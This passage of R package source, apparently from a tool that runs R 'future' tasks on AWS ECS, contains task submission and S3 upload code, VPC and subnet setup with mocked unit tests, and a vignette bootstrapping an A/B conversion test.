      cat_warn(sprintf("  [WARNING] Failed to track task ARN: %s\n", e$message))
    })
  }

  cat_success(sprintf("[OK] Launched %d workers for session: %s\n",
                     backend$workers, backend$session_id))

  invisible(NULL)
}

#' Upload task for detached session
#'
#' @param task_id Task identifier
#' @param task_data Task data (expr, globals, packages, session_id)
#' @param backend Backend environment
#' @return Invisibly returns NULL
#' @keywords internal
upload_detached_task <- function(task_id, task_data, backend) {
  s3 <- get_s3_client(backend$region)
  task_key <- sprintf("tasks/%s.qs", task_id)

  temp_file <- tempfile(fileext = ".qs")
  on.exit(unlink(temp_file), add = TRUE)

  qs2::qs_save(task_data, temp_file)

  s3$put_object(
    Bucket = backend$bucket,
    Key = task_key,
    Body = temp_file
  )

  invisible(NULL)
}

#' Submit detached worker to ECS
#'
#' @param backend Backend environment
#' @param task_id Task ID for the worker to execute
#' @return Task ARN
#' @keywords internal
submit_detached_worker <- function(backend, task_id) {
  ecs <- get_ecs_client(backend$region)

  # Prepare network configuration
  awsvpc_config <- list(
    subnets = backend$subnets,
    securityGroups = backend$security_groups
  )

  # Add assignPublicIp only for Fargate (EC2 doesn't support it)
  if (backend$launch_type != "EC2") {
    awsvpc_config$assignPublicIp <- "ENABLED"
  }

  # Build run_task parameters
  run_task_params <- list(
    cluster = backend$cluster_name,
    taskDefinition = backend$task_definition_arn,
    count = 1L,
    networkConfiguration = list(
      awsvpcConfiguration = awsvpc_config
    ),
    overrides = list(
      containerOverrides = list(
        list(
          name = "starburst-worker",
          environment = list(
            list(name = "TASK_ID", value = task_id),
            list(name = "S3_BUCKET", value = backend$bucket),
            list(name = "AWS_DEFAULT_REGION", value = backend$region)
          )
        )
      )
    )
  )

  # Add launch-type specific parameters
  if (backend$launch_type == "EC2") {
    run_task_params$capacityProviderStrategy <- list(
      list(
        capacityProvider = backend$capacity_provider_name,
        weight = 1
      )
    )
  } else {
    run_task_params$launchType <- "FARGATE"
  }

  # Submit task with retry logic
  response <- with_ecs_retry(
    {
      do.call(ecs$run_task, run_task_params)
    },
    max_attempts = 3,
    operation_name = "ECS RunTask (detached worker)"
  )

  # Check for failures
  if (length(response$failures) > 0) {
    failure <- response$failures[[1]]
    stop(sprintf("Failed to submit worker: %s - %s",
                failure$reason, failure$detail))
  }

  # Return task ARN
  if (length(response$tasks) > 0) {
    return(response$tasks[[1]]$taskArn)
  } else {
    stop("No task ARN returned from ECS")
  }
}

#' Reconstruct backend from session manifest
#'
#' Used when reattaching to an existing session
#'
#' @param manifest Session manifest from S3
#' @return Backend environment
#' @keywords internal
reconstruct_backend_from_manifest <- function(manifest) {
  # Extract backend configuration
  backend_config <- manifest$backend
  backend_config$session_id <- manifest$session_id
  backend_config$mode <- "detached"
  backend_config$created_at <- manifest$created_at

  # Set task counts from stats
  backend_config$total_tasks <- manifest$stats$total_tasks
  backend_config$completed_tasks <- manifest$stats$completed
  backend_config$failed_tasks <- manifest$stats$failed

  # Convert to environment
  backend_env <- list2env(backend_config, parent = emptyenv())
  class(backend_env) <- c("StarburstBackend", "DetachedBackend", "environment")

  backend_env
}

#' VPC, subnet, and security group management for staRburst
#'
#' @name network
#' @keywords internal
NULL

#' Get starburst subnets
#'
#' @param region AWS region
#' @return Vector of subnet IDs
#' @keywords internal
get_starburst_subnets <- function(region) {
  config <- get_starburst_config()
  config$subnets
}

#' Get starburst security groups
#'
#' @param region AWS region
#' @return Vector of security group IDs
#' @keywords internal
get_starburst_security_groups <- function(region) {
  config <- get_starburst_config()
  config$security_groups
}

#' Get or create subnets
#'
#' @keywords internal
get_or_create_subnets <- function(vpc_id, region) {
  ec2 <- get_ec2_client(region)

  # Check for existing subnets with starburst tag
  subnets <- ec2$describe_subnets(
    Filters = list(
      list(Name = "vpc-id", Values = list(vpc_id)),
      list(Name = "tag:ManagedBy", Values = list("starburst"))
    )
  )

  if (length(subnets$Subnets) > 0) {
    return(vapply(subnets$Subnets, function(s) s$SubnetId, FUN.VALUE = character(1)))
  }

  # Get existing subnets to check if VPC has any
  all_subnets <- ec2$describe_subnets(
    Filters = list(
      list(Name = "vpc-id", Values = list(vpc_id))
    )
  )

  if (length(all_subnets$Subnets) > 0) {
    # Use existing subnets (don't create new ones unnecessarily)
    return(vapply(all_subnets$Subnets, function(s) s$SubnetId, FUN.VALUE = character(1)))
  }

  # Create subnets in multiple availability zones
  cat_info("   * Creating subnets for VPC...\n")

  # Get available AZs
  azs <- ec2$describe_availability_zones(
    Filters = list(
      list(Name = "region-name", Values = list(region)),
      list(Name = "state", Values = list("available"))
    )
  )

  if (length(azs$AvailabilityZones) == 0) {
    stop("No availability zones found in region")
  }

  # Create subnets in first 2-3 AZs
  num_subnets <- min(3, length(azs$AvailabilityZones))
  subnet_ids <- character(0)

  for (i in 1:num_subnets) {
    az <- azs$AvailabilityZones[[i]]$ZoneName
    cidr_block <- sprintf("10.0.%d.0/24", i)

    tryCatch({
      subnet <- ec2$create_subnet(
        VpcId = vpc_id,
        CidrBlock = cidr_block,
        AvailabilityZone = az
      )

      subnet_id <- subnet$Subnet$SubnetId

      # Tag subnet
      ec2$create_tags(
        Resources = list(subnet_id),
        Tags = list(
          list(Key = "Name", Value = sprintf("starburst-subnet-%d", i)),
          list(Key = "ManagedBy", Value = "starburst")
        )
      )

      # Enable auto-assign public IP
      ec2$modify_subnet_attribute(
        SubnetId = subnet_id,
        MapPublicIpOnLaunch = list(Value = TRUE)
      )

      subnet_ids <- c(subnet_ids, subnet_id)
      cat_info(sprintf("   * Created subnet: %s in %s\n", subnet_id, az))

    }, error = function(e) {
      cat_warn(sprintf("   * Failed to create subnet in %s: %s\n", az, e$message))
    })
  }

  if (length(subnet_ids) == 0) {
    stop("Failed to create any subnets")
  }

  return(subnet_ids)
}

#' Get or create security group
#'
#' @keywords internal
get_or_create_security_group <- function(vpc_id, region) {
  ec2 <- get_ec2_client(region)

  # Look for existing starburst security group
  sgs <- ec2$describe_security_groups(
    Filters = list(
      list(Name = "vpc-id", Values = list(vpc_id)),
      list(Name = "group-name", Values = list("starburst-worker"))
    )
  )

  if (length(sgs$SecurityGroups) > 0) {
    return(sgs$SecurityGroups[[1]]$GroupId)
  }

  # Create security group
  sg <- ec2$create_security_group(
    GroupName = "starburst-worker",
    Description = "Security group for staRburst workers",
    VpcId = vpc_id
  )

  sg$GroupId
}

#' Get VPC configuration for ECS tasks
#'
#' @keywords internal
get_vpc_config <- function(region) {
  ec2 <- get_ec2_client(region)

  # Get default VPC
  vpcs <- ec2$describe_vpcs(
    Filters = list(
      list(Name = "isDefault", Values = list("true"))
    )
  )

  if (length(vpcs$Vpcs) == 0) {
    stop("No default VPC found. Please create a VPC in region: ", region)
  }

  vpc_id <- vpcs$Vpcs[[1]]$VpcId

  # Get or create subnets
  subnets <- get_or_create_subnets(vpc_id, region)

  if (length(subnets) == 0) {
    stop("Failed to create subnets in VPC: ", vpc_id)
  }

  # Get or create security group
  sg_id <- get_or_create_security_group(vpc_id, region)

  list(
    vpc_id = vpc_id,
    subnets = as.list(subnets),
    security_groups = list(sg_id)
  )
}

test_that("get_or_create_subnets returns existing tagged subnets", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock EC2 client
  ec2_client <- list(
    describe_subnets = function(Filters) {
      # Check if filtering by starburst tag
      if (any(sapply(Filters, function(f) {
        f$Name == "tag:ManagedBy" && "starburst" %in% f$Values
      }))) {
        # Return starburst-tagged subnets
        list(
          Subnets = list(
            list(SubnetId = "subnet-123"),
            list(SubnetId = "subnet-456")
          )
        )
      } else {
        list(Subnets = list())
      }
    }
  )

  mockery::stub(get_or_create_subnets, "get_ec2_client", function(...) {
    ec2_client
  })

  result <- get_or_create_subnets("vpc-123", "us-east-1")

  expect_equal(result, c("subnet-123", "subnet-456"))
})

test_that("get_or_create_subnets uses existing untagged subnets", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock EC2 client
  ec2_client <- list(
    describe_subnets = function(Filters) {
      # Check if filtering by starburst tag
      has_tag_filter <- any(sapply(Filters, function(f) {
        f$Name == "tag:ManagedBy"
      }))

      if (has_tag_filter) {
        # No starburst-tagged subnets
        list(Subnets = list())
      } else {
        # Return existing subnets
        list(
          Subnets = list(
            list(SubnetId = "subnet-existing-1"),
            list(SubnetId = "subnet-existing-2")
          )
        )
      }
    }
  )

  mockery::stub(get_or_create_subnets, "get_ec2_client", function(...) {
    ec2_client
  })

  result <- get_or_create_subnets("vpc-123", "us-east-1")

  expect_equal(result, c("subnet-existing-1", "subnet-existing-2"))
})

test_that("get_or_create_subnets creates subnets in multiple AZs", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  subnets_created <- list()

  # Mock EC2 client
  ec2_client <- list(
    describe_subnets = function(...) {
      list(Subnets = list())  # No existing subnets
    },
    describe_availability_zones = function(...) {
      list(
        AvailabilityZones = list(
          list(ZoneName = "us-east-1a"),
          list(ZoneName = "us-east-1b"),
          list(ZoneName = "us-east-1c"),
          list(ZoneName = "us-east-1d")
        )
      )
    },
    create_subnet = function(VpcId, CidrBlock, AvailabilityZone) {
      subnet_id <- paste0("subnet-", length(subnets_created) + 1)
      subnets_created[[subnet_id]] <<- list(
        VpcId = VpcId,
        CidrBlock = CidrBlock,
        AvailabilityZone = AvailabilityZone
      )
      list(Subnet = list(SubnetId = subnet_id))
    },
    create_tags = function(...) {
      list()
    },
    modify_subnet_attribute = function(...) {
      list()
    }
  )

  mockery::stub(get_or_create_subnets, "get_ec2_client", function(...) {
    ec2_client
  })

  result <- get_or_create_subnets("vpc-123", "us-east-1")

  # Should create 3 subnets (min of 3 and number of AZs)
  expect_length(result, 3)
  expect_length(subnets_created, 3)

  # Check CIDR blocks
  expect_equal(subnets_created[[1]]$CidrBlock, "10.0.1.0/24")
  expect_equal(subnets_created[[2]]$CidrBlock, "10.0.2.0/24")
  expect_equal(subnets_created[[3]]$CidrBlock, "10.0.3.0/24")

  # Check AZs
  expect_equal(subnets_created[[1]]$AvailabilityZone, "us-east-1a")
  expect_equal(subnets_created[[2]]$AvailabilityZone, "us-east-1b")
  expect_equal(subnets_created[[3]]$AvailabilityZone, "us-east-1c")
})

test_that("get_or_create_subnets limits to 3 subnets", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  subnets_created <- 0

  # Mock EC2 client with many AZs
  ec2_client <- list(
    describe_subnets = function(...) {
      list(Subnets = list())
    },
    describe_availability_zones = function(...) {
      list(
        AvailabilityZones = list(
          list(ZoneName = "us-east-1a"),
          list(ZoneName = "us-east-1b"),
          list(ZoneName = "us-east-1c"),
          list(ZoneName = "us-east-1d"),
          list(ZoneName = "us-east-1e"),
          list(ZoneName = "us-east-1f")
        )
      )
    },
    create_subnet = function(...) {
      subnets_created <<- subnets_created + 1
      subnet_id <- paste0("subnet-", subnets_created)
      list(Subnet = list(SubnetId = subnet_id))
    },
    create_tags = function(...) list(),
    modify_subnet_attribute = function(...) list()
  )

  mockery::stub(get_or_create_subnets, "get_ec2_client", function(...) {
    ec2_client
  })

  result <- get_or_create_subnets("vpc-123", "us-east-1")

  # Should only create 3 subnets
  expect_equal(subnets_created, 3)
  expect_length(result, 3)
})

test_that("get_or_create_subnets handles creation errors gracefully", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  attempt <- 0

  # Mock EC2 client
  ec2_client <- list(
    describe_subnets = function(...) {
      list(Subnets = list())
    },
    describe_availability_zones = function(...) {
      list(
        AvailabilityZones = list(
          list(ZoneName = "us-east-1a"),
          list(ZoneName = "us-east-1b"),
          list(ZoneName = "us-east-1c")
        )
      )
    },
    create_subnet = function(...) {
      attempt <<- attempt + 1
      if (attempt == 2) {
        stop("Subnet creation failed")
      }
      list(Subnet = list(SubnetId = paste0("subnet-", attempt)))
    },
    create_tags = function(...) list(),
    modify_subnet_attribute = function(...) list()
  )

  mockery::stub(get_or_create_subnets, "get_ec2_client", function(...) {
    ec2_client
  })

  result <- get_or_create_subnets("vpc-123", "us-east-1")

  # Should return 2 subnets (1 failed)
  expect_length(result, 2)
})

test_that("get_or_create_subnets fails if no subnets created", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock EC2 client that always fails
  ec2_client <- list(
    describe_subnets = function(...) {
      list(Subnets = list())
    },
    describe_availability_zones = function(...) {
      list(
        AvailabilityZones = list(
          list(ZoneName = "us-east-1a")
        )
      )
    },
    create_subnet = function(...) {
      stop("Creation failed")
    }
  )

  mockery::stub(get_or_create_subnets, "get_ec2_client", function(...) {
    ec2_client
  })

  expect_error(
    get_or_create_subnets("vpc-123", "us-east-1"),
    "Failed to create any subnets"
  )
})

test_that("get_or_create_subnets enables auto-assign public IP", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  public_ip_enabled <- list()

  # Mock EC2 client
  ec2_client <- list(
    describe_subnets = function(...) {
      list(Subnets = list())
    },
    describe_availability_zones = function(...) {
      list(
        AvailabilityZones = list(
          list(ZoneName = "us-east-1a")
        )
      )
    },
    create_subnet = function(...) {
      list(Subnet = list(SubnetId = "subnet-1"))
    },
    create_tags = function(...) list(),
    modify_subnet_attribute = function(SubnetId, MapPublicIpOnLaunch) {
      public_ip_enabled[[SubnetId]] <<- MapPublicIpOnLaunch$Value
      list()
    }
  )

  mockery::stub(get_or_create_subnets, "get_ec2_client", function(...) {
    ec2_client
  })

  get_or_create_subnets("vpc-123", "us-east-1")

  expect_true(public_ip_enabled[["subnet-1"]])
})

#' Create a Future using Starburst Backend
#'
#' This is the entry point called by the Future package when a plan(starburst) is active
#'
#' @param expr Expression to evaluate
#' @param envir Environment for evaluation
#' @param substitute Whether to substitute the expression
#' @param globals Globals to export (TRUE for auto-detection, list for manual)
#' @param packages Packages to load
#' @param lazy Whether to lazily evaluate (always FALSE for remote)
#' @param seed Random seed
#' @param stdout Whether to capture stdout (TRUE, FALSE, or NA)
#' @param conditions Character vector of condition classes to capture
#' @param label Optional label for the future
#' @param ... Additional arguments
#'
#' @return A StarburstFuture object
#' @importFrom future future
#' @method future starburst
#' @export
future.starburst <- function(expr, envir = parent.frame(), substitute = TRUE,
                             lazy = FALSE, seed = FALSE, globals = TRUE,
                             packages = NULL, stdout = TRUE, conditions = "condition",
                             label = NULL, ...) {
  StarburstFuture(
    expr = expr,
    envir = envir,
    substitute = substitute,
    globals = globals,
    packages = packages,
    lazy = lazy,
    seed = seed,
    stdout = stdout,
    conditions = conditions,
    label = label,
    ...
  )
}

#' StarburstFuture Constructor
#'
#' Creates a Future object for evaluation on AWS workers (EC2 by default, or Fargate)
#'
#' @param expr Expression to evaluate
#' @param envir Environment for evaluation
#' @param substitute Whether to substitute the expression
#' @param globals Globals to export (TRUE for auto-detection, list for manual)
#' @param packages Packages to load
#' @param lazy Whether to lazily evaluate (always FALSE for remote)
#' @param seed Random seed
#' @param ... Additional arguments
#'
#' @return A StarburstFuture object
#' @keywords internal
#' @export
StarburstFuture <- function(expr, envir = parent.frame(), substitute = TRUE,
                            globals = TRUE, packages = NULL, lazy = FALSE,
                            seed = FALSE, stdout = TRUE, conditions = "condition",
                            label = NULL, ...) {

  # Substitute expression if needed
  if (substitute) {
    expr <- substitute(expr)
  }

  # Get current plan
  plan_obj <- future::plan("next")

  # Get backend from plan attributes or options
  backend <- attr(plan_obj, "backend")

  if (is.null(backend)) {
    # Try to get from options
    backend <- getOption("starburst.current_backend")
  }

  if (is.null(backend)) {
    stop("No starburst backend found. Call plan(starburst, ...) first.")
  }

  if (!inherits(backend, "StarburstBackend")) {
    class(backend) <- c("StarburstBackend", "FutureBackend", class(backend))
  }

  # Auto-detect globals and packages
  if (isTRUE(globals)) {
    gp <- future::getGlobalsAndPackages(expr, envir = envir, globals = TRUE)
    globals <- gp$globals
    if (is.null(packages)) {
      packages <- gp$packages
    }
  } else if (is.list(globals) && !inherits(globals, "Globals")) {
    # Convert plain list to Globals object for proper serialization
    globals <- globals::as.Globals(globals)
  }

  # Generate task ID
  task_id <- sprintf("task-%s", gsub("-", "", uuid::UUIDgenerate()))

  # Create future object as a list first
  f_list <- list(
    expr = expr,
    envir = envir,
    globals = globals,
    packages = packages,
    seed = seed,
    task_id = task_id,
    backend = backend,
    state = "created",
    result_value = NULL,
    task_arn = NULL,
    submitted_at = NULL,
    ...
  )

  # Convert to environment for mutability
  f <- list2env(f_list, parent = emptyenv())

  # Set class after conversion to environment
  class(f) <- c("StarburstFuture", "Future", "environment")

  f
}

#' Run a StarburstFuture
#'
#' Submits the future task to AWS for execution (EC2 by default, or Fargate)
#'
#' @param future A StarburstFuture object
#' @param ... Additional arguments
#'
#' @return The future object (invisibly)
#' @importFrom future run resolved result
#' @export
run.StarburstFuture <- function(future, ...) {

  # Skip if already running or resolved
  if (future$state %in% c("running", "finished")) {
    return(invisible(future))
  }

  # Get backend/plan
  backend <- future$backend

  # Serialize task data
  task_data <- list(
    expr = future$expr,
    globals = future$globals,
    packages = future$packages,
    seed = future$seed
  )

  # Upload to S3
  s3 <- get_s3_client(backend$region)
  task_key <- sprintf("tasks/%s.qs", future$task_id)
  temp_file <- tempfile(fileext = ".qs")

  tryCatch({
    qs2::qs_save(task_data, temp_file)
    s3$put_object(
      Bucket = backend$bucket,
      Key = task_key,
      Body = temp_file
    )
  }, finally = {
    unlink(temp_file)
  })

  # Check if we should queue or submit immediately
  if (backend$quota_limited) {
    # Add to wave queue
    future$state <- "queued"
    backend$wave_queue$pending <- append(
      backend$wave_queue$pending,
      list(future)
    )
    # Try to submit next wave
    check_and_submit_wave(backend)
  } else {
    # Submit immediately
    submit_task(future, backend)
  }

  invisible(future)
}

#' Check if StarburstFuture is Resolved
#'
#' Checks whether the future task has completed execution
#'
#' @param x A StarburstFuture object
#' @param ... Additional arguments
#'
#' @return Logical indicating if the future is resolved
#' @export
resolved.StarburstFuture <- function(x, ...) {
  future <- x  # Match generic signature
  # If already resolved, return TRUE
  if (future$state == "finished") {
    return(TRUE)
  }

  # If queued, check if wave has progressed
  if (future$state == "queued") {
    backend <- future$backend
    if (backend$quota_limited) {
      check_and_submit_wave(backend)
    }
    return(FALSE)
  }

  # If not running yet, return FALSE
  if (future$state != "running") {
    return(FALSE)
  }

  # Check S3 for result
  backend <- future$backend
  s3 <- get_s3_client(backend$region)
  result_key <- sprintf("results/%s.qs", future$task_id)

  result_exists <- tryCatch({
    s3$head_object(
      Bucket = backend$bucket,
      Key = result_key
    )
    TRUE
  }, error = function(e) {
    FALSE
  })

  if (result_exists) {
    future$state <- "finished"
    return(TRUE)
  }

  # Check if task failed (optional: query ECS for task status)
  # For now, just return FALSE
  FALSE
}

#' Get Result from StarburstFuture
#'
#' Retrieves the result from a resolved future
#'
#' @param future A StarburstFuture object
#' @param ... Additional arguments
#'
#' @return A FutureResult object
#' @export
result.StarburstFuture <- function(future, ...) {
  # If already have result, return it
  if (!is.null(future$result_value)) {
    return(future$result_value)
  }

  # Wait for resolution
  while (!resolved(future)) {
    Sys.sleep(1)
  }

  # Download result from S3
  backend <- future$backend
  s3 <- get_s3_client(backend$region)
  result_key <- sprintf("results/%s.qs", future$task_id)
  temp_file <- tempfile(fileext = ".qs")

  tryCatch({
    s3$download_file(
      Bucket = backend$bucket,
      Key = result_key,
      Filename = temp_file
    )
    result_data <- qs2::qs_read(temp_file)
  }, finally = {
    unlink(temp_file)
  })

  # Create FutureResult object
  if (!is.null(result_data$error) && result_data$error) {
    # Task failed
    result_obj <- structure(
      list(
        value = NULL,
        visible = TRUE,
        stdout = result_data$stdout %||% "",
        conditions = list(
          simpleError(result_data$message %||% "Task failed")
        ),
        version = "1.8"
      ),
      class = "FutureResult"
    )
  } else {
    # Task succeeded
    result_obj <- structure(
      list(
        value = result_data$value,
        visible = TRUE,
        stdout = result_data$stdout %||% "",
        conditions = list(),
        version = "1.8"
      ),
      class = "FutureResult"
    )
  }

  # Cache result
  future$result_value <- result_obj

  # Update backend stats
  backend$completed_tasks <- backend$completed_tasks + 1

  result_obj
}

#' Submit Task to ECS
#'
#' Internal function to submit a task to ECS (Fargate or EC2)
#'
#' @param future StarburstFuture object
#' @param backend Backend/plan object
#' @keywords internal
submit_task <- function(future, backend) {

  # Ensure task definition exists
  if (is.null(backend$task_definition_arn)) {
    backend$task_definition_arn <- get_or_create_task_definition(backend)
  }

  # Handle EC2 pool warmup if needed
  if (backend$launch_type == "EC2" && is.null(backend$pool_started_at)) {
    cat_info("[Setup] Starting warm EC2 pool (~2 min first time)...\n")
    start_warm_pool(backend, backend$workers)
    backend$pool_started_at <- Sys.time()
  }

  # Get ECS client
  ecs <- get_ecs_client(backend$region)

  # Get network configuration
  vpc_config <- get_vpc_config(backend$region)

  # Build base run_task parameters
  run_task_params <- list(
    cluster = backend$cluster,
    taskDefinition = backend$task_definition_arn,
    networkConfiguration = list(
      awsvpcConfiguration = list(
        subnets = vpc_config$subnets,
        securityGroups = vpc_config$security_groups,
        assignPublicIp = "ENABLED"
      )
    ),
    overrides = list(
      containerOverrides = list(
        list(
          name = "starburst-worker",
          environment = list(
            list(name = "TASK_ID", value = future$task_id),
            list(name = "S3_BUCKET", value = backend$bucket),
            list(name = "AWS_DEFAULT_REGION", value = backend$region),
            list(name = "CLUSTER_ID", value = backend$cluster_id)
          )
        )
      )
    )
  )

  # Add launch-type specific parameters
  if (backend$launch_type == "EC2") {
    run_task_params$capacityProviderStrategy <- list(
      list(
        capacityProvider = backend$capacity_provider_name,
        weight = 1
      )
    )
    run_task_params$placementConstraints <- list(
      list(
        type = "memberOf",
        expression = sprintf("attribute:ecs.instance-type == %s",
                           backend$instance_type)
      )
    )
  } else {
    run_task_params$launchType <- "FARGATE"
  }

  # Submit task
  response <- do.call(ecs$run_task, run_task_params)

  if (length(response$tasks) > 0) {
    future$task_arn <- response$tasks[[1]]$taskArn
    future$submitted_at <- Sys.time()
    future$state <- "running"

    # Store task ARN for monitoring
    store_task_arn(future$task_id, future$task_arn)
  } else {
    # Task submission failed
    failure_msg <- if (length(response$failures) > 0) {
      sprintf("%s: %s", response$failures[[1]]$reason, response$failures[[1]]$detail)
    } else {
      "Unknown reason"
    }
    stop(sprintf("Failed to submit task: %s", failure_msg))
  }

  invisible(NULL)
}

#' Check and Submit Wave if Ready
#'
#' Checks wave queue and submits next wave if current wave is complete
#'
#' @param backend Backend environment
#' @keywords internal
check_and_submit_wave <- function(backend) {

  if (!backend$quota_limited) {
    return(invisible(NULL))
  }

  # Check how many futures are currently running
  running_futures <- backend$wave_queue$wave_futures
  running_count <- length(running_futures)

  # Remove completed futures from wave_futures
  if (running_count > 0) {
    still_running <- list()
    for (i in seq_along(running_futures)) {
      future_obj <- running_futures[[i]]
      if (!resolved(future_obj)) {
        still_running <- append(still_running, list(future_obj))
      } else {
        backend$wave_queue$completed <- backend$wave_queue$completed + 1
      }
    }
    backend$wave_queue$wave_futures <- still_running
    running_count <- length(still_running)
  }

  # If current wave is empty and there are pending futures, start new wave
  pending_futures <- backend$wave_queue$pending
  if (running_count == 0 && length(pending_futures) > 0) {
    # Calculate how many tasks to submit in this wave
    tasks_to_submit <- min(backend$workers_per_wave, length(pending_futures))

    cat_info(sprintf(
      "[Status] Starting wave %d: submitting %d tasks (%d pending, %d completed)\n",
      backend$wave_queue$current_wave,
      tasks_to_submit,
      length(pending_futures),
      backend$wave_queue$completed
    ))

    # Submit futures
    for (i in seq_len(tasks_to_submit)) {
      future_obj <- pending_futures[[1]]
      backend$wave_queue$pending <- pending_futures[-1]
      pending_futures <- backend$wave_queue$pending

      # Submit the future to Fargate
      submit_task(future_obj, backend)

      # Add to wave_futures for tracking
      backend$wave_queue$wave_futures <- append(
        backend$wave_queue$wave_futures,
        list(future_obj)
      )
    }

    # Increment wave counter
    backend$wave_queue$current_wave <- backend$wave_queue$current_wave + 1
  }

  invisible(NULL)
}

# Note: %||% operator defined in R/utils.R

#' @keywords internal
#' @importFrom stats runif
#' @importFrom utils capture.output
"_PACKAGE"

# The following block is used by usethis to automatically manage
# roxygen namespace tags. Modify with care!
## usethis namespace: start
## usethis namespace: end
NULL

# Package-level environment for internal state
.starburst_env <- new.env(parent = emptyenv())

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(42)
# 
# # Variant A (control)
# n_a <- 10000
# conversions_a <- 850
# variant_a <- c(rep(1, conversions_a), rep(0, n_a - conversions_a))
# 
# # Variant B (treatment)
# n_b <- 10000
# conversions_b <- 920
# variant_b <- c(rep(1, conversions_b), rep(0, n_b - conversions_b))
# 
# # Observed difference
# observed_diff <- mean(variant_b) - mean(variant_a)
# cat(sprintf("Observed conversion rates:\n"))
# cat(sprintf("  Variant A: %.2f%%\n", mean(variant_a) * 100))
# cat(sprintf("  Variant B: %.2f%%\n", mean(variant_b) * 100))
# cat(sprintf("  Difference: %.2f%% (%.1f%% relative lift)\n",
#             observed_diff * 100,
#             (observed_diff / mean(variant_a)) * 100))

## ----bootstrap-fn, eval=FALSE-------------------------------------------------
# bootstrap_iteration <- function(iter, data_a, data_b) {
#   # Resample with replacement
#   n_a <- length(data_a)
#   n_b <- length(data_b)
# 
#   sample_a <- sample(data_a, n_a, replace = TRUE)
#   sample_b <- sample(data_b, n_b, replace = TRUE)
# 
#   # Calculate metrics
#   rate_a <- mean(sample_a)
#   rate_b <- mean(sample_b)
#   diff <- rate_b - rate_a
#   relative_lift <- diff / rate_a
# 
#   list(
#     iteration = iter,
#     rate_a = rate_a,
#     rate_b = rate_b,
#     diff = diff,
#     relative_lift = relative_lift,
#     b_wins = diff > 0
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# n_bootstrap_local <- 1000
# 
# cat(sprintf("Running %d bootstrap iterations locally...\n", n_bootstrap_local))
# local_start <- Sys.time()
# 
# local_results <- lapply(
#   1:n_bootstrap_local,
#   bootstrap_iteration,
#   data_a = variant_a,
#   data_b = variant_b
# )
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# cat(sprintf("[OK] Completed in %.2f seconds\n\n", local_time))

## ----cloud, eval=FALSE--------------------------------------------------------
# n_bootstrap <- 10000
# 
# cat(sprintf("Running %d bootstrap iterations on AWS...\n", n_bootstrap))
# 
# results <- starburst_map(
#   1:n_bootstrap,
#   bootstrap_iteration,
#   data_a = variant_a,
#   data_b = variant_b,
#   workers = 25,
#   cpu = 1,
#   memory = "2GB"
# )

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract metrics
# diffs <- sapply(results, function(x) x$diff)
# relative_lifts <- sapply(results, function(x) x$relative_lift)
# b_wins <- sapply(results, function(x) x$b_wins)
# 
# # Calculate confidence intervals
# ci_95 <- quantile(diffs, c(0.025, 0.975))
# ci_99 <- quantile(diffs, c(0.005, 0.995))
# 
# # Probability that B is better than A
# prob_b_wins <- mean(b_wins) * 100
# 
# # Print results
# cat("\n=== Bootstrap Results (10,000 iterations) ===\n\n")
# cat(sprintf("Observed difference: %.2f%%\n", observed_diff * 100))
# cat(sprintf("\n95%% Confidence Interval: [%.2f%%, %.2f%%]\n",
#             ci_95[1] * 100, ci_95[2] * 100))
# cat(sprintf("99%% Confidence Interval: [%.2f%%, %.2f%%]\n",
#             ci_99[1] * 100, ci_99[2] * 100))
# cat(sprintf("\nProbability that B > A: %.1f%%\n", prob_b_wins))
# 
# # Statistical significance
# if (ci_95[1] > 0) {
#   cat("\n[OK] Result is statistically significant at 95% confidence level\n")
#   cat("  (95% CI does not include zero)\n")
# } else {
#   cat("\n[X] Result is NOT statistically significant at 95% confidence level\n")
#   cat("  (95% CI includes zero)\n")
# }
# 
# # Relative lift analysis
# cat(sprintf("\nRelative lift: %.1f%%\n",
#             median(relative_lifts) * 100))
# cat(sprintf("95%% CI for relative lift: [%.1f%%, %.1f%%]\n",
#             quantile(relative_lifts, 0.025) * 100,
#             quantile(relative_lifts, 0.975) * 100))

## ----viz, eval=FALSE----------------------------------------------------------
# # Create histogram
# hist(diffs * 100,
#      breaks = 50,
#      main = "Bootstrap Distribution of Conversion Rate Difference",
#      xlab = "Difference in Conversion Rate (percentage points)",
#      col = "lightblue",
#      border = "white")
# 
# # Add reference lines
# abline(v = 0, col = "red", lwd = 2, lty = 2)
# abline(v = ci_95 * 100, col = "darkblue", lwd = 2, lty = 2)
# abline(v = observed_diff * 100, col = "darkgreen", lwd = 2)
# 
# # Add legend
# legend("topright",
#        c("Observed difference", "Zero (no effect)", "95% CI"),
#        col = c("darkgreen", "red", "darkblue"),
#        lwd = 2,
#        lty = c(1, 2, 2))

## ----multi-metric, eval=FALSE-------------------------------------------------
# bootstrap_all_metrics <- function(iter, data_a, data_b) {
#   n_a <- length(data_a)
#   n_b <- length(data_b)
# 
#   sample_a <- sample(data_a, n_a, replace = TRUE)
#   sample_b <- sample(data_b, n_b, replace = TRUE)
# 
#   # Multiple metrics
#   rate_a <- mean(sample_a)
#   rate_b <- mean(sample_b)
#   se_a <- sd(sample_a) / sqrt(n_a)
#   se_b <- sd(sample_b) / sqrt(n_b)
# 
#   list(
#     diff_rate = rate_b - rate_a,
#     relative_lift = (rate_b - rate_a) / rate_a,
#     z_score = (rate_b - rate_a) / sqrt(se_a^2 + se_b^2),
#     effect_size = (rate_b - rate_a) / sqrt((var(sample_a) + var(sample_b)) / 2)
#   )
# }
# 
# # Run multi-metric bootstrap
# multi_results <- starburst_map(
#   1:10000,
#   bootstrap_all_metrics,
#   data_a = variant_a,
#   data_b = variant_b,
#   workers = 25
# )

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/bootstrap.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/bootstrap.R", package = "starburst"))

## ----setup, include=FALSE-----------------------------------------------------
knitr::opts_chunk$set(eval = FALSE)

